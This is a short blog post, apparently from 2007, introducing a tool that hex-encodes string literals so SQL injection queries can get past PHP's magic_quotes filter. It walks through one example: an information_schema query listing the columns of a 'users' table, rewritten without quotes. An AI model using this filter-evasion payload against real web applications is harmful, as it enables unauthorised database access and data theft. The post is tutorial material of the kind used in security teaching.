This javascript tool converts the string with quotes to quoteless form via MySQL string functions such as CHAR and CONCAT.You can use this tool when you want to escape from magic_quotes control of PHP.This tool can be used especially at numeric injections.
For example :
------------------
SELECT column_name,1 FROM information_schema.columns WHERE table_schema='sql_injection_lessons' && table_name='users'
------------------
This query contains quotes, and they will be filtered with magic qoutes so that the query won't be able to run succesfully.But if you convert 'users' to 0x7573657273 and 'sql injection_lessons' to 0x73716C5F696E6A656374696F6E5F6C6573736F6E73
------------------
SELECT column_name,1 FROM information_schema.columns WHERE table_schema=0x73716C5F696E6A656374696F6E5F6C6573736F6E73 && table_name=0x7573657273
------------------
There won't be any problem such as quotes because there are no quotes at all and we can succesfully bypass the magic quotes filter.

Add a comment

Posted by Mesut TİMUR on 11 Kasım 2007 Pazar 23:28:21 EET#